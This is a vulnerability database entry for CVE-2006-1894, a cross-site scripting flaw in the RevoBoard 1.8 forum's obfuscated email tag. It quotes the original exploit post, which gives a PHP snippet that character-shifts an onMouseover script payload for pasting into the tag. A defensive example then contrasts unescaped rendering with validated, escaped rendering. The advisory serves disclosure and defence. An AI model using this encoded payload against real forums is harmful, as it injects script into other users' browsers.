RevoBoard Cross-Site Scripting Vulnerability

Vulnerability ID: 1195273    Vulnerability type: Cross-site scripting
Published: 2006-04-20    Updated: 2006-04-20
CVE ID: CVE-2006-1894    CNNVD-ID: CNNVD-200604-394
Platform: N/A    CVSS score: 4.3
|Vulnerability source
https://www.securityfocus.com/bid/84007
https://cxsecurity.com/issue/WLB-2006040091
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-394
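|Vulnerability details
RevoBoard 1.8 is derived from PunBB and contains a cross-site scripting vulnerability. It allows remote attackers to inject arbitrary web script or HTML via a substitution cipher of the email tag. The substitution cipher is translated when the application's email address obfuscator is reversed.
|Exploit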
Revoboard (php) is based on an earlier version of PunBB.
I know for sure that this affects v1.8.

The email tag parser obfuscates emails to stop harvesters. To execute code, do this:
[php]
$code = ''" onMouseover="javascript:alert(/xss/)">';
$str = '';
// Shift each character's code down by 2.
for($a=0;$a<strlen($code);$a++){
     $c = ord(substr($code,$a,1));
     $c += intval(-2);
     $str .= chr($c); // append the shifted character
}
print $str;
[/php]

And you just paste $str into the tag =).

r0xes

dynxss.whiteacid.org
criticalsecurity.net
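
For a defender, the point of the shift-by-two substitution in the post above is that the markup only exists after the scrambling is reversed, so validation and escaping have to be applied to the decoded value at output time. The following PHP example is added here and is not RevoBoard's or PunBB's code; the function names, the `SHIFT` constant, the server-side decode step and the sample inputs are assumptions.

```php
<?php
// Added example. Function names and the +2 reverse shift are assumptions
// modelled on the -2 shift in the post; this is not RevoBoard's code.
const SHIFT = 2;

// Apply a byte-wise shift; shift(-SHIFT) scrambles, shift(+SHIFT) reverses.
function shift(string $s, int $by): string {
    $out = '';
    for ($i = 0; $i < strlen($s); $i++) {
        $out .= chr((ord($s[$i]) + $by) & 0xFF);
    }
    return $out;
}

// Flawed pattern: output is built from the decoded value with no escaping.
function render_email_unsafe(string $scrambled): string {
    $addr = shift($scrambled, SHIFT);
    return '<a href="mailto:' . $addr . '">' . $addr . '</a>';
}

// Hardened: validate the decoded value, then escape it for HTML output.
function render_email_safe(string $scrambled): string {
    $addr = shift($scrambled, SHIFT);
    if (filter_var($addr, FILTER_VALIDATE_EMAIL) === false) {
        return '[invalid email]';
    }
    // Still escape: valid addresses may contain characters such as ' or &.
    $esc = htmlspecialchars($addr, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a href="mailto:' . $esc . '">' . $esc . '</a>';
}

// Constructed inputs: one ordinary address, one value carrying markup.
$samples = [
    shift("o'brien@example.com", -SHIFT),
    shift('x"><b>bold</b>', -SHIFT),
];
foreach ($samples as $s) {
    echo 'stored: ', $s, "\n";
    echo 'unsafe: ', render_email_unsafe($s), "\n";
    echo 'safe:   ', render_email_safe($s), "\n\n";
}
```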
|Affected products
Revoboard Revoboard 1.8
|References

Source: BUGTRAQ
Name: 20060413 RevoBoard [email] tag XSS
Link: http://www.securityfocus.com/archive/1/archive/1/430886/100/0/threaded
Source: SREASON
Name: 768
Link: http://securityreason.com/securityalert/768